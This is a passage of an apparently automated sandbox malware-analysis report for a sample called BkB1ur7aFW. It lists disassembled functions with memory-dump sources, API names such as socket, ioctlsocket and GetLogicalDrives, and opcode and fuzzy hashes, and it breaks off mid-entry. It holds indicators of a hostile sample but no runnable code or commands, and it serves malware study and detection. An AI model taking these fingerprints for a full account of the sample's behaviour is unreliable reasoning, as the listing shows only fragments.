1691 4baec0-4baedb call 4ae180 1689->1691 1690->1612 1691->1612 1694 4baee1-4baeec 1691->1694 1695 4baeee-4baeff 1694->1695 1696 4baf02-4baf06 1694->1696 1695->1696 1697 4baf08-4baf0b 1696->1697 1698 4baf0e-4baf15 1696->1698 1697->1698 1698->1604
                                                              APIs
                                                              • socket.WS2_32(FFFFFFFF,?,00000000), ref: 004BAB9B
                                                              • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 004BABE4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: ioctlsocketsocket
                                                              • String ID:
                                                              • API String ID: 416004797-0
                                                              • Opcode ID: 88f3dcd5399cac0fd7bc4fdde53d5865d5ea07009f33354ac2a4022e30974e6b
                                                              • Instruction ID: e80c594d493347348bef5fc27b6ec90cdbed2250187ebf307a4253d3e272d96d
                                                              • Opcode Fuzzy Hash: 88f3dcd5399cac0fd7bc4fdde53d5865d5ea07009f33354ac2a4022e30974e6b
                                                              • Instruction Fuzzy Hash: 89E1E3706043019BEB20CF24C884BAB77E5EF85304F144A2EF9999B391D779E964CB67
                                                              Function 0713005A Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 0e864c104e8f0874651b94237ba639d6db1929de578bee0252c873be9ffbc4ea
                                                              • Instruction ID: 8daba047454efa60e66c32f745c4b6ab7010ea54a07ecc59b0b859711ea68baa
                                                              • Opcode Fuzzy Hash: 0e864c104e8f0874651b94237ba639d6db1929de578bee0252c873be9ffbc4ea
                                                              • Instruction Fuzzy Hash: 4F51F3EB16C125BE710A80951B55AFB2BAFD5DF770F338426F807DA5C2E3888B4A4171
                                                              Function 0713001B Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 306COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 73f820ba47bc5e838d9294a72c9975691a9244aa678ec05bc08fe5af7cd36951
                                                              • Instruction ID: 02666c176f0865dc5e5c1857a7ad0cf051fb34ff8e339106623f5faf8eaae7bf
                                                              • Opcode Fuzzy Hash: 73f820ba47bc5e838d9294a72c9975691a9244aa678ec05bc08fe5af7cd36951
                                                              • Instruction Fuzzy Hash: EE5104EB16C125BE710A80951B54AFA2BEFD5DF770F338026F807DA5C2E3888B4A0171
                                                              Function 07130000 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 299COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: a7ebc06bb159ec4a4d0a3bc9a0ba637cb72629bc12172a14d82bf5103a181b88
                                                              • Instruction ID: d5944e0879b6885a7f1ba1bdeed9d30eb0bc1a1de477c0fa8311a9bd9bc36b96
                                                              • Opcode Fuzzy Hash: a7ebc06bb159ec4a4d0a3bc9a0ba637cb72629bc12172a14d82bf5103a181b88
                                                              • Instruction Fuzzy Hash: B051C3EB16C125FE714A80952B54AFA2AEFD5DF770F338026F807DA5C2E3984B490071
                                                              Function 07130009 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 299COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 3cd00114aa79d79f2db4010d5f4a918d4a84a06003c7efb5056083c3df2f4831
                                                              • Instruction ID: 4c969961a9cf73aa5eea15c46845b4d4ad36026cfb333600276153efa163396b
                                                              • Opcode Fuzzy Hash: 3cd00114aa79d79f2db4010d5f4a918d4a84a06003c7efb5056083c3df2f4831
                                                              • Instruction Fuzzy Hash: 3551C3EB16C125BE710A80952B54AFA2AEFD5DF770F338026F807DA6C2E3984B490171
                                                              Function 07130046 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 287COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: d4bb98d50a453ccd64559d844e11b8e8c57cf9b2fcc2df0ea4d30385b99d02f6
                                                              • Instruction ID: bedb835a8887720d3db4406854581b22e95a222340ab681ceb752a353b71e2cb
                                                              • Opcode Fuzzy Hash: d4bb98d50a453ccd64559d844e11b8e8c57cf9b2fcc2df0ea4d30385b99d02f6
                                                              • Instruction Fuzzy Hash: 2451D2EB16C125BE710A80952B54AFA2AAFD5DF770F338426F807DA5C2E3884B490071
                                                              Function 07130080 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 278COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 361fbd996e1777d7b66839f7fd08c7e6ce66dcb3d41f5364e2742957db3dd250
                                                              • Instruction ID: b2e7660bb55532a8183b04f3177bfc53e12f1ed0748c5a7e8d1ea75274fd084c
                                                              • Opcode Fuzzy Hash: 361fbd996e1777d7b66839f7fd08c7e6ce66dcb3d41f5364e2742957db3dd250
                                                              • Instruction Fuzzy Hash: 9251A3EB16C125BE724A80952B55AFB2BAFD5DF730F33842AF807D6582E3884B494171
                                                              Function 071300AA Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 275COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: f3dc580d54fd42a8a879409c17cc59cb52756665e9e7a17c31fe992a2610e05c
                                                              • Instruction ID: ad077170e14c4a0ab711597456ced6eb08511575835b8bee72033dd85df68930
                                                              • Opcode Fuzzy Hash: f3dc580d54fd42a8a879409c17cc59cb52756665e9e7a17c31fe992a2610e05c
                                                              • Instruction Fuzzy Hash: FA51B3EB16C125BE714A80952B55AFA2BEFD5DF730F33842AF807D6582E3888B490171
                                                              Function 0713013A Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 273COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: d2a78043d89e4abcffe8f66c68cae4d7f4b622688ae9c24bef3f9ffcfdcabaa1
                                                              • Instruction ID: bc06e976f4170cf5e991a9c9b24e8c712945119fd03ffa8cb925e4d36eb5a125
                                                              • Opcode Fuzzy Hash: d2a78043d89e4abcffe8f66c68cae4d7f4b622688ae9c24bef3f9ffcfdcabaa1
                                                              • Instruction Fuzzy Hash: F351E5EB15C125BEB20A81952B54AFB6BAFE5DF730F338426F807D65C2E3884B494171
                                                              Function 0713017D Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 270COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 0187bcadf11dd2d2e55cbea3625f7c06b536e784218b0f444f023c5b85b0fa24
                                                              • Instruction ID: 7e11621056ec1f7a188b898531c78ad09b9bf60d5b301ed6db89e71a7bd22ca1
                                                              • Opcode Fuzzy Hash: 0187bcadf11dd2d2e55cbea3625f7c06b536e784218b0f444f023c5b85b0fa24
                                                              • Instruction Fuzzy Hash: F351D5EB26C121BE760AC1912B54AFB6BAFD5DF730B338427F807D6582E3848B494171
                                                              Function 071300D1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 270COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 1966b2c9db18ea4a5f71e4da642f7ae19429bdd73dbdaa8cfbad7c3037df0068
                                                              • Instruction ID: 23de0af9a39879d23cb7928164b650d15dddd7be20fcc44af4d8c22f7270a7c2
                                                              • Opcode Fuzzy Hash: 1966b2c9db18ea4a5f71e4da642f7ae19429bdd73dbdaa8cfbad7c3037df0068
                                                              • Instruction Fuzzy Hash: B35192EB16C125BE710A80952B55AFB6BAFE5DF730B33842AF807D6582E3884B494171
                                                              Function 0713015A Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 267COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 317d397b4ae397a54da0d321d629d2d6da3b3a691f40f250bc31151fdfa877cb
                                                              • Instruction ID: b3e8ca2005da299fb2c2c74d505cfcdc70d9d86045baa99d656ed33d4473e04c
                                                              • Opcode Fuzzy Hash: 317d397b4ae397a54da0d321d629d2d6da3b3a691f40f250bc31151fdfa877cb
                                                              • Instruction Fuzzy Hash: 0251B4FB26C125BE710A91952B54AFA6BAFD5DF730B338427F807D6582E3888B490171
                                                              Function 071300EC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 267COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: f624da5574ae004e974997ad3df3a3f4c601595fefc7cb32571eeae4f7d3df9c
                                                              • Instruction ID: aec0ca550d047a22567513cd71b077f42c21bde15347f4f1aff5e22b91cc6645
                                                              • Opcode Fuzzy Hash: f624da5574ae004e974997ad3df3a3f4c601595fefc7cb32571eeae4f7d3df9c
                                                              • Instruction Fuzzy Hash: 8851F3FB16C125BE720A81952B54AFB6BAFD5DF730B338427F807D6582E3884B494171
                                                              Function 071300C4 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 262COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 96fc1bb6930e850a04fd25c767cc2aa2190c560ce5769f533f760790a3b8f5c3
                                                              • Instruction ID: 9321edaae1f6fa06261bf0b66c30026edcda1d65ab97549884a08801697bcd65
                                                              • Opcode Fuzzy Hash: 96fc1bb6930e850a04fd25c767cc2aa2190c560ce5769f533f760790a3b8f5c3
                                                              • Instruction Fuzzy Hash: 0E51A3EB16C125FE710A80962B55AFB2BAFD5DF730F338426F807D6582E3884B495171
                                                              Function 0713011F Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 251COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 30f823f22ad3261a2f399302f5bd4046ba0f71e191727429f8b4887198c8f4fc
                                                              • Instruction ID: ee19bb7eb5dfeb96e2724f36e6b08f14fade326a2ebd9d0f12390a6c795e377d
                                                              • Opcode Fuzzy Hash: 30f823f22ad3261a2f399302f5bd4046ba0f71e191727429f8b4887198c8f4fc
                                                              • Instruction Fuzzy Hash: C751A1FB16C125FE710A80922B54AFA6BAFD5DF730B32842AF807D6582E3984B494171
                                                              Function 071301BB Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 219COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 44a7599fe05aa4c998f951a7ff276d09c6736b0a9b2ce3faf3aa0339f9a88947
                                                              • Instruction ID: 138e7a692c1e102a716d1e9a39163043dc32cae8991c43bbccc67ebbcb8d5926
                                                              • Opcode Fuzzy Hash: 44a7599fe05aa4c998f951a7ff276d09c6736b0a9b2ce3faf3aa0339f9a88947
                                                              • Instruction Fuzzy Hash: 394193FB16C125FE7209D0952B54AFB6BAFD5DF730B32842AF807D6582E3844B494171
                                                              Function 071301EE Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 207COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: fc0d46501a39362413a151b85d6604c242ff1b12bdab7a048b188755a5c4190d
                                                              • Instruction ID: b30986ea918e66e62b99dbe7ba9cb21a7868999710e0480f2e02a6bdee5497f8
                                                              • Opcode Fuzzy Hash: fc0d46501a39362413a151b85d6604c242ff1b12bdab7a048b188755a5c4190d
                                                              • Instruction Fuzzy Hash: 04419FFB16C125BE710AD0952B64EFA6BAFD5DF730B32842BF807D6582E3884B490171
                                                              Function 07130215 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 204COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 6cac3673df95b7d0f4029ac311f92dcc1cee7a3b2c1fb637c659e92715d133d2
                                                              • Instruction ID: 78d9ea9b583311356725d65e9cac40b16cd4558b502e160e6806a66ddefc6a70
                                                              • Opcode Fuzzy Hash: 6cac3673df95b7d0f4029ac311f92dcc1cee7a3b2c1fb637c659e92715d133d2
                                                              • Instruction Fuzzy Hash: 4F418EFB16C125BE710AD1952B64AFA2BAFE5DF730B32842BF807D5582E3984B490171
                                                              Function 071301FA Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 203COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 47c7d12e5a2473a8b980af33f1cdd2c0374f14cf65ea76e76db6e5a014b6f7ea
                                                              • Instruction ID: 63cc3dc186a618f339efc1c3e757a313294bfecf03ea2c2d00ececbaf2888b50
                                                              • Opcode Fuzzy Hash: 47c7d12e5a2473a8b980af33f1cdd2c0374f14cf65ea76e76db6e5a014b6f7ea
                                                              • Instruction Fuzzy Hash: 6C4190EB16C125FE710AD1952B64AFA2BAFE5DF730B32842BF807D5582E3984B490171
                                                              Function 07130226 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 202COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 7ba0320ef6fdf25f97227b18154f76d20d7184220f4f72a5923fdb00bd421550
                                                              • Instruction ID: 7dc97d63fb21eddcfcdb9c6ddf5744fd2f1a52f4ef42a908c24c859cf4d618d5
                                                              • Opcode Fuzzy Hash: 7ba0320ef6fdf25f97227b18154f76d20d7184220f4f72a5923fdb00bd421550
                                                              • Instruction Fuzzy Hash: B341F4FB11C155FEB20AD1952B54AFA6BAED5DF730B32882BF803D6582E3944B494131
                                                              Function 071302B2 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 4fcfeec5134c182d2e2f2c1eba4b98c7498bf4e05e6e41c72a1daf8c7c6ae6ac
                                                              • Instruction ID: 4881a7659d04dfbb90678a707151468adf0f24474ce7ebe842a24841b2771435
                                                              • Opcode Fuzzy Hash: 4fcfeec5134c182d2e2f2c1eba4b98c7498bf4e05e6e41c72a1daf8c7c6ae6ac
                                                              • Instruction Fuzzy Hash: FC4123FB11C225EE720AD5A16B54AFE6BAFE5DF730B32842BF803D6482E3544B494171
                                                              Function 07130261 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 188COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 5eca03b2cf3e0d5163fa9e6cb65313474d43f9a6808e63fcc3d06ba950a8851f
                                                              • Instruction ID: 669d4bd020faf78d4252a05334f7141beb95167fc92cab3e6f17fec7e08170c2
                                                              • Opcode Fuzzy Hash: 5eca03b2cf3e0d5163fa9e6cb65313474d43f9a6808e63fcc3d06ba950a8851f
                                                              • Instruction Fuzzy Hash: 2D41E4FB51C115BEB209D1A12B54AFA2BAFE5DB730B33842BF803D6582E3984B494171
                                                              Function 0713029A Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 171COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: b4533e761aebe463dcbd383b9716823caf282fc3b1226d3c31f3cbe4d0929372
                                                              • Instruction ID: b6684dc0659518e11916965fa74adf0b6bcafcac70ee819f8c066792d3a6a851
                                                              • Opcode Fuzzy Hash: b4533e761aebe463dcbd383b9716823caf282fc3b1226d3c31f3cbe4d0929372
                                                              • Instruction Fuzzy Hash: 6E31D2FB15C125FE720AD1952B54AFA2BAFE5DF730B32842BF807D6582E3984B490171
                                                              Function 071302CD Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 171COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 09cc8de45544b533799bf3a1e30dc75d9cd5e4b2f07dccbf9069e4c9ac835029
                                                              • Instruction ID: a2d65608cab7fd5f12dba570f1dd72dc722344527e6b2ec581deb649c5452cdf
                                                              • Opcode Fuzzy Hash: 09cc8de45544b533799bf3a1e30dc75d9cd5e4b2f07dccbf9069e4c9ac835029
                                                              • Instruction Fuzzy Hash: 503117FB11C215FEB20A91A52B546FA6BFFE9DB730B32846AF803D5583E3494B494131
                                                              Function 071303A3 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 170COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 8deca90dde61eb562f2c0d95e0aa526edca88e04bc0cfb0bba98cd4e6006e7bd
                                                              • Instruction ID: 3eaedd7caa44a8415b95277b92ed0891e0a93acc25ce2572313faa3f7a592e5b
                                                              • Opcode Fuzzy Hash: 8deca90dde61eb562f2c0d95e0aa526edca88e04bc0cfb0bba98cd4e6006e7bd
                                                              • Instruction Fuzzy Hash: 2C414FFB10C255AFB606D1A51B586FA7FBFDACB730B32846BF842D6082E3944B094171
                                                              Function 003FF7B0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 168networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: CloseEvent
                                                              • String ID: multi.c
                                                              • API String ID: 2624557715-214371023
                                                              • Opcode ID: 8135017061805a6dae30ec23685abf5b254015b9ad6b638d5804b07b1a72885f
                                                              • Instruction ID: 9feff89dddbf5356745ef2b38306a0465e71553de74468ddaf372a5335ca9452
